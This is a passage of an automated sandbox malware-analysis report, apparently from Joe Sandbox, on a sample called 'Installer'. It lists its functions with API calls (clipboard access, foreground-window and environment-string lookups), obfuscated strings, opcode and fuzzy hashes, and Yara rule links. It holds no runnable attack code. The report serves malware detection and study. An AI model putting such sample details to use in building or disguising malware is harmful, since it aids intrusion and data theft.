                                                                                                                                                                                                                                                    Function 00430412 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                                    • Opcode ID: 0b4ce9226a80c191448de904934235e090dea553ac8c548883bf7eee67a76e56
                                                                                                                                                                                                                                                    • Instruction ID: edea177d1479d643d5abc38f34b971a966137ca73a35f0b7da0467f95eeb9627
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4ce9226a80c191448de904934235e090dea553ac8c548883bf7eee67a76e56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61F098B450A7018FE354DF28D4A8B1BBBF0FB85314F10891CE5A98B390CBB59948CF86
                                                                                                                                                                                                                                                    Function 0040C73B Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C74D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                                                                                                                                    • Opcode ID: 4a533f3d69b86a9f98a1958157cd7cacc4402abbb5c7b231e86568349e28ee20
                                                                                                                                                                                                                                                    • Instruction ID: d2d1222bed764c505e01a7a437c987e67b96d2d96dffea12848baf7fbc3a0441
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a533f3d69b86a9f98a1958157cd7cacc4402abbb5c7b231e86568349e28ee20
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E0ECB57A430067FAAC6B14DD22F2521555783B20F35422CA612BD6E4C9942502461C
                                                                                                                                                                                                                                                    Function 0043ED29 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0043ED37
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ForegroundWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2020703349-0
                                                                                                                                                                                                                                                    • Opcode ID: a9ffe737249dc3e0122e0f7b10e8a54413ea6789124a50639fd91797d931d788
                                                                                                                                                                                                                                                    • Instruction ID: e9d83bbf03ffa0495804572a0f9332504b97f5da304552063f637eff08c1ad84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ffe737249dc3e0122e0f7b10e8a54413ea6789124a50639fd91797d931d788
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E012F9D401548FCB04DF64FC955243374FB562057144439E112C3271D735E522CB59
                                                                                                                                                                                                                                                    Function 0043CAF2 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 0043CB0B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                                    • Opcode ID: 5a61d3da357a9b9377e023cb1afacc8d5594f4b24d9fa0354fd77178c021c893
                                                                                                                                                                                                                                                    • Instruction ID: 1226c4ec29f38b57e24691680627c35296be4bb29b2a26d95288c068be923f2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a61d3da357a9b9377e023cb1afacc8d5594f4b24d9fa0354fd77178c021c893
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAC08C70141122EBD3102F15BC0BB963A10AF01312F0208B2B0006D0B2CA78ECB0C6C8
                                                                                                                                                                                                                                                    Function 0043CAC0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,B19801D9,004086F7,B4B7D921), ref: 0043CAD0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: fc5eda2e49f68f0e30b130f1320f09b628e5b9bd0ed49f4e6fdc7f947bd58373
                                                                                                                                                                                                                                                    • Instruction ID: 562293d3e3569241bb9a478438e2c4c3206b523b80c2934943ed8cc9fbbd0605
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc5eda2e49f68f0e30b130f1320f09b628e5b9bd0ed49f4e6fdc7f947bd58373
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76C04C71445121AAD6102B15EC09B867F54AF45751F014095B104660B286B0EC928AD8

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00419C90 Relevance: 18.8, APIs: 2, Strings: 8, Instructions: 1349COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0043EBA0: LdrInitializeThunk.NTDLL(00441BF8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A269
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A2DE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                    • String ID: 2E'G$54+*$54+*$54+*$8I#K$8U:W$XY$~Q6S
                                                                                                                                                                                                                                                    • API String ID: 764372645-2390782495
                                                                                                                                                                                                                                                    • Opcode ID: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                                                                                                                                                                    • Instruction ID: 2c3f929d4cabc55a225c70deac7f21d0ad3b9eba4449c3fe9de0e78d4448d8f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3982067460A3409FD714CB24D990BABBBE2EBC6314F18882DE58587352D779DC92CB4B
                                                                                                                                                                                                                                                    Function 00417E1A Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 937COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 54+*$A$S<.+$\xy>
                                                                                                                                                                                                                                                    • API String ID: 0-3685461857
                                                                                                                                                                                                                                                    • Opcode ID: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                                                                                                                                                                    • Instruction ID: b9dae982806908fc93e9902a33def771db61ac40b6c91c0664327fad2570cd92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 115212726183418BC725CF28C8A17ABB7E2FFD6314F18496EE4C58B391DB399846C746
                                                                                                                                                                                                                                                    Function 00433600 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                                                                                                    • Opcode ID: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                                                                                                                                                                    • Instruction ID: 5078fe84b0e2f8b0d482d572d4820ca8f51d2eda85a3955b293059345ad65239
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B41D4F480C7819FD700AF78D14A36ABFE0AB16345F04853ED48587641D37DA659C797
                                                                                                                                                                                                                                                    Function 00428770 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 291COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428850
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004288B5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: A%g'$_\efg$efg
                                                                                                                                                                                                                                                    • API String ID: 237503144-2372333709
                                                                                                                                                                                                                                                    • Opcode ID: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
                                                                                                                                                                                                                                                    • Instruction ID: ccad30b6dcc476866ed8e691afcd1205d7334b7ec1782e1d821448a32adf35b5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41A1ACB2E002688FEB148FA8DC917DEBBB1FB45304F5145B9D91AAB281DB3059468F94
                                                                                                                                                                                                                                                    Function 0041780D Relevance: 7.9, Strings: 6, Instructions: 427COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: o4i$$w=q$1c;m$5k5u$A$S<.+
                                                                                                                                                                                                                                                    • API String ID: 0-1763114429
                                                                                                                                                                                                                                                    • Opcode ID: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                                                                                                                                                                    • Instruction ID: afb31bd0c27c82544a17a6576629b60a2b4a96c899e5dad63360a4cbb890e339
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4D1ADB55093808BD7348F29C4A17EBB7E1EFD6314F05896ED4CA8B351EB785901CB86
                                                                                                                                                                                                                                                    Function 0040A770 Relevance: 7.9, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %751$./$4=/U$E]Qw$wNoL$j^h
                                                                                                                                                                                                                                                    • API String ID: 0-997366216
                                                                                                                                                                                                                                                    • Opcode ID: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                                                                                                                                                                    • Instruction ID: 7a5dc0394ecbf34ac9b8307d7efc7bae40aec903ea1c7f0c69f60aa070f276f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12C19B7564C3444BD324EF6488502ABFBE39FC1304F19883DE4D5AB382D6B9C9168B8B
                                                                                                                                                                                                                                                    Function 00426190 Relevance: 6.5, Strings: 5, Instructions: 244COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: )L$*+$@C$HR$pO
                                                                                                                                                                                                                                                    • API String ID: 0-3083683625
                                                                                                                                                                                                                                                    • Opcode ID: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                                                                                                                                                                    • Instruction ID: 5fe24d867cb9075332fe1ade04ad22fabc6e99e6679ddeed31bd91dff5edfe56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 637134B06493518BD310DF25E89166BBBF1EFD2360F58891DE4C18B391E7789505CB8B
                                                                                                                                                                                                                                                    Function 00418DE6 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                                                                    • API String ID: 0-2547889144
                                                                                                                                                                                                                                                    • Opcode ID: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
                                                                                                                                                                                                                                                    • Instruction ID: 2db9ac68f453c0b2d94bf9f393f819a8b1a8f76bd3cef0c41518664d486a93b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F114766183529BD714CF29C8906ABB7E2EFC9310F08896DE8C587391EB38DD45C752
                                                                                                                                                                                                                                                    Function 00415F19 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 54+*$7$:_A$gfff
                                                                                                                                                                                                                                                    • API String ID: 0-323440868
                                                                                                                                                                                                                                                    • Opcode ID: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
                                                                                                                                                                                                                                                    • Instruction ID: 974855a4ab02da3001828df224cdb3c791939bff7d675949acd43d199703548e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EB13972A142118BD328CF38CC527EBBAD6EBC5314F0A867DD885DB395DB78980687C5
                                                                                                                                                                                                                                                    Function 00426EB0 Relevance: 5.3, Strings: 4, Instructions: 281COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: *+$1>$bxB$OI
                                                                                                                                                                                                                                                    • API String ID: 0-1035774624
                                                                                                                                                                                                                                                    • Opcode ID: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
                                                                                                                                                                                                                                                    • Instruction ID: 2bcf0024169a31bcf5d17f9542290146e57be21ae5465408edeec82165f3d5e6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3791ECB46083808FD734DF24E852BAFB7A1FB82314F44492DE5898B241DB789946CB5B
                                                                                                                                                                                                                                                    Function 00416790 Relevance: 5.2, Strings: 4, Instructions: 248COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: 54+*$54+*$54+*$MnA
                                                                                                                                                                                                                                                    • API String ID: 2994545307-957495038
                                                                                                                                                                                                                                                    • Opcode ID: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
                                                                                                                                                                                                                                                    • Instruction ID: dd597300f9b4ef6573e6ef65d23cc5c487566c46e2a7da0a635b7d7db396d5cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E261E97461D3808FD315CB3888907EBBBE5EB8A350F25896ED1D1C72A1D738D885CB5A
                                                                                                                                                                                                                                                    Function 0041E7A0 Relevance: 4.7, Strings: 3, Instructions: 938COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: !&& $2"\\$v
                                                                                                                                                                                                                                                    • API String ID: 0-66690623
                                                                                                                                                                                                                                                    • Opcode ID: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
                                                                                                                                                                                                                                                    • Instruction ID: e9b17d7d6cb25fd7e8af81ca0dca0c33645f5d3503e302bb4264f03f34b07c3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62527B7450C3818FC725CF25C8506AFBFE1AF96314F088A6EE8D54B392D7398946CB56
                                                                                                                                                                                                                                                    Function 0043A120 Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: 54+*$54+*$54+*
                                                                                                                                                                                                                                                    • API String ID: 2994545307-26850336
                                                                                                                                                                                                                                                    • Opcode ID: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
                                                                                                                                                                                                                                                    • Instruction ID: d7f07654b581cdb91e5346d4e79727cc379c0b8875721e9d15300a6a5d61dc92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FD177357883009FDB14CB25C882A7BB7A2EBC9354F18A52EE5C557391C778EC06878B
                                                                                                                                                                                                                                                    Function 0042D306 Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: F]EH$Uo#_$[:
                                                                                                                                                                                                                                                    • API String ID: 0-1241761701
                                                                                                                                                                                                                                                    • Opcode ID: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
                                                                                                                                                                                                                                                    • Instruction ID: b3be92acc381a827a91cc0f17c6e37e2be9106d66737dd4d561d2fb3aa3361bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C7158B4A083A19BD3198B3994A033BBBE09F97305F58856EF4D68B381D67D8C04C756
                                                                                                                                                                                                                                                    Function 0042D4D0 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
